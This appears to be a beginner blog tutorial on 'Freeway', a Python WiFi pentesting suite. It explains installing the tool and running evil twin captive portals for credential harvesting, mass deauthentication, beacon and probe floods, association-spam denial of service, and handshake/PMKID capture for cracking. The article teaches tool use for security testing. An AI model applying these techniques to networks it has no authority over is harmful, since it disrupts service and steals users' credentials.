In this article we will focus on exploiting vulnerabilities of the WiFi protocol (IEEE 802.XX) using the Freeway.
NOTE: Adapter supporting monitor mode and frame injection is necessary to perform the actions described below. Some popular choices include TP-Link WN722N v1/2/3, and ALFA adapters.
1. What is Freeway?
The provided tool is a Python Network Pentesting suite that features attack, sniff and audit techniques we will focus on later. It’s meant for cybersecurity professionals and beginners to aid them in assessing Network Security.
2. Why Freeway?
There are many scripts, tools, and suites but very few of them make it that easy. With user-friendly CLI and all techniques in one place, it’s difficult to get unsatisfying results. Some other great tools that Freeway is similar to could be mdk4 or aircrack-ng.
3. Introduction
Sniffing — There are invisible electrical signals flying in the air, they contain information on what device is sending them (if not spoofed), what they are addressed to, and what data they carry. Utilizing an adapter with monitor mode, we can sniff all those packets, so listen to and capture them.
Audit — Using sniffed packets we are able to determine some very specific information, including Mac addresses of the sender and receiver, channel, signal, ESSID (broadcasted name), probes, uptime, encryption and every client connected to the AP (Access Point)
Attacks — There is a vast number of methods for network disruption, password packet capture, Denial of Service (DoS), and we will cover most of them later.
4. Setup
In this section, we will focus on getting Freeway to work on your machine from any directory in the terminal (e.g., /home/kali).
Here’s all that you need:
- Any Linux distribution OS (Kali, Parrot, Raspbian, etc.)
- Network adapter supporting monitor mode and frame injection
- ‘git’ installed (sudo apt-get install git)
- Python 3.11+ with pip
Now, one easy step:
$ sudo pip install 3wayWe’ve successfully managed to install Freeway.
5. Pentesting
Let’s get straight to the point.
We can easily run Freeway by executing one command:
$ sudo FreewayThis will display the CLI (Command Line Interface) and guide the user through initial configuration.
NOTE: You must agree to the EULA when prompted, this should never appear again when accepted
Choose the interface that supports monitor mode
Great, we are now in the Freeway menu
For every feature you can select additional parameters (Packet Monitor example)
★ Evil Twin
This freshly added option, hosts a legitimate Access Point, with a captive portal. This ‘legitimate’ AP asks user to login, and displays a website, before the internet access can be granted, making credential harvests easy, and feasible.
Let’s focus on actual operation scheme of an Evil Twin attack, as its not only creating the AP with a captive portal. A Twin would be a clone of an existing AP — Equal MAC, equal SSID. Devices usually connect to the nearest known AP, so what if we spoof a legitimate network?
Device after pairing with the AP, will make a request to get a login page, and we reroute that request to our /index.html. After user enters credentials and click submit, we capture the data directly to the terminal.
Evil Twin Summary
Freeway includes 3 templates for credential harvesting: google, mrhacker (image above), mcd (McDonald’s), Valentines (non-harmful). We can easily create a template, attach photos or large css files to it, those will also be transmitted over our ‘legitimate’ network. There’s thousands of possibilities, from tricking user into downloading/ uploading a file, to getting him to login into gmail. Evil Twin should be used with caution, as it can compromise whole businesses.
★ Packet Monitor
Choose addons and filters or just press enter to scan nearby WiFi environment.
Network Packet Monitoring is a technique to obtain informations that are usually not visible to simple network adapters.
To protect my and others devices I’m not going to post the screenshot of the results screen, this is to check out by yourself.
Packet Monitor Summary
A powerful tool for network exploring and information gathering that captures all the APs and Clients information including PMKIDs and 4-way Handshakes in Hashcat crackable format (more on that later), clients that are connected to the AP, channel on which router is transmitting, the signal strength, and resolves manufacturer names.
★ Deauth
Deauthentication attack is a method used to disconnect client(s) from the AP, in which the attacker device sends a deauthentication frame to the target AP, that contains either the address of the device to disconnect or the broadcast address to kick all clients at once.
The screenshot below presents Mass Deauth option of the Freeway
Usually, the devices after being kicked try to connect again and again, it’s a good moment for capturing association frames.
Deauthentication Attack Summary
Freeway has many options that help in performing the attack safely or more dangerously, this includes:
- Signal range (dBm)
- Specific channel
- Single Mac adress
- Single ESSID
- Mass Deauth (broadcast)
- and more..
While deauthing is easy to understand, exploit, and doesn’t need further elaboration, please have in mind that it might also be very disruptive.
NOTE: Freeway creates one thread for each AP or client, in order to maximize the efficiency.
★ Beacon Flood
A beacon is a frame that every network sends to become visible to nearby WiFi scanners, such as mobile devices and computers. Flooding the area with these packets results in the creation of fake WiFi access points. While clients can see these access points, they cannot connect to them.
To make the attack more authentic, we create fake clients among fake networks.
NOTE: The ‘total’ is not a sum of only Beacons and Clients, there are also Probe Requests and Probe Responses that are being sent
Results:
Beacon Flood Summary
An invasive technique used to confuse nearby WiFi scanners involves injecting fake beacon frames or improperly formatted ones. This can test the scanners’ ability to handle unusual frames.
★ Packet Fuzzer
Fuzzing involves sending various malformed or unexpected packets to a device to observe its reactions. Below, we will cover several methods for network fuzzing. This technique can include actions such as sending incorrect or oversized beacon frames, among others.
1. Packet Reply
→ Use the adapter’s monitor mode to simply capture packets and retransmit them. This can result in unexpected behavior from all devices, including APs and clients, so exercise caution.
2. RTS/CTS flood
→ The Ready To Send and Clear To Send frames will signal to the nearby WiFi environment that the channel your adapter is using is currently busy, potentially resulting in a Denial of Service (DoS).
3. Auth/ Assoc spam
→ Attempts to connect fake clients to the network. Handling the association by the receiving device requires more time than sending the packet to the AP. This effectively keeps the AP busy, preventing any new legitimate associations. This method is very effective for testing the device’s ability to handle a large number of clients. Typically, after reaching the maximum number of clients, the AP will crash and, in most cases, restart.
4. Probe Requests spam
→ Probes can be divided into two mechanisms:
- Probe Requests – contain the MAC address of the device searching for network(s), and the MAC address of a specific AP being searched for (or broadcast to all APs)
- Probe Responses – an AP must respond to each probe request; these responses can include information such as the SSID (network name), supported data rates, and other network parameters that help the device determine if it can connect to the AP and what services are available
By sending many probe requests, we can keep the AP busy because it needs to respond to each one. This process takes more time than sending well-prepared packets.
Packet Fuzzer Summary
Most devices are vulnerable to one or more fuzzing method, making the packet fuzzer a valuable tool for WiFi penetration testing. Freeway gathers many techniques under one place, without having to manually look for scripts or entering commands.
★ Network Audit
Sometimes, we prefer to focus on auditing a single network rather than collecting a bunch of unnecessary data. Auditing will provide a comprehensive list of all information about the target, including the clients associated with it.
(not a full screenshot due to big resolution)
Network Audit Summary
Audit becomes useful once we have already scanned the current environment and obtained either the MAC address of the target or the ESSID (name). The information we gather can serve many purposes. Like the Packet Monitor, the network audit also captures PMKIDs and handshakes.
★ Channel Hopper
This is the last, but not least, feature of the Freeway tool. Every WiFi module, whether in client or AP devices, transmits on a specific channel or range of channels. The most popular channels for 2.4GHz are 1, 6, and 11; for 5GHz, they range from 36 to 165. When a channel is busy, the network can switch to another one, but when the entire range is busy… well, that’s a problem.
Channel Hopper Summary
The less interference, the better – except for penetration testers. We aim to create interference to observe how devices react. Dynamically changing the channel of our network adapter can increase the chances of a successful attack.
In next sections of this article, we will focus on describing the tool deeper
So, if you are new to the Linux system, feel uncomfortable with its terminal, or just wanted to test your own WiFi security, I hope you found the information you were looking for.
Happy Hacking! 🦠
6. Quick Access
Freeway’s functions can be called from the terminal, as already presented, every function has its number and name. Those are the -a arguments (full for „action”), for example:
sudo Freeway -i wlan2 -a monitorcommand will run the forementioned Packet Monitor using „wlan2" interface.
Okay, but where went the addons and filters of the Packet Monitor?
Well, I need to quickly mention that this exact part was the hardest one to write yet, because Medium keeps removing this part and instead replaces with the above block of code for an unknown reason, everytime I leave the app to get a link or to check something.
Anyways, providing only ‘-a’ argument will not let you jump straight into the action. Instead, it will display the CLI asking for additional parameters:
So in order to skip whole CLI process, the ‘-p’ argument was ✨ invented ✨. It works with equal syntax as is in the CLI, example:
sudo Freeway -i wlan2 -a monitor -p 1,2,aNOTE: The ‘-a’ argument can also be provided using feature numbers e.g., 1 for monitor
7. Password Capture
Using the Packet Monitor or the Network Audit we can capture PMKIDs and 4-way Handshakes. We only need two EAPOL packets for each, but no worries, our tool does this part of the job for us. They are being saved to the /caps folder of the Freeway directory (/usr/local/share/3way) and can be decoded via Hashcat. For obvious reasons, we are not going to cover the cracking part in this article, because it’s extremely easy.
That being said, we’ve successfully reached the end of this article. The Freeway has a lot more to cover, but I would not let you miss the fun of discovering new things.
I’m glad that you reached this far, thank you for your time and wish you the best wherever you are in your hacking journey!
I’m fresh to writing on Medium, so if you appreciate the article, please leave me a follow, share the article, like or whatever.
